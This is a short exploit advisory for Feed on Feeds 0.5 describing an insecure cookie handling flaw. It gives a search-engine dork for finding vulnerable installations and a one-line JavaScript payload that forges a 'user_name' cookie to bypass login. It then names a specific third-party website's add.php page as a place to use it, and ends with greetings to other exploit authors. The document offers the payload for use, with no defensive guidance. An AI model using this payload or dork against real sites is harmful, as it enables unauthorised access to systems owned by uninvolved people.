============================================================================================================================ | # Title : FEED ON FEEDS 0.5 insecure cookie handling Vulnerability | | # Author : indoushka | | # email : indoushka4ever@gmail.com | | # Tested on : windows 10 Français V.(Pro) | | # Version : 0.5 | | # Vendor : https://github.com/minutils/feed-on-feeds | | # Dork : Feed on Feeds - Log on | ============================================================================================================================ poc : [+] Dorking İn Google Or Other Search Enggine [+] use payload : javascript:document.cookie="user_name=user_password_hash;path=/"; go to : http://www.ijqf.org/feed/add.php Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================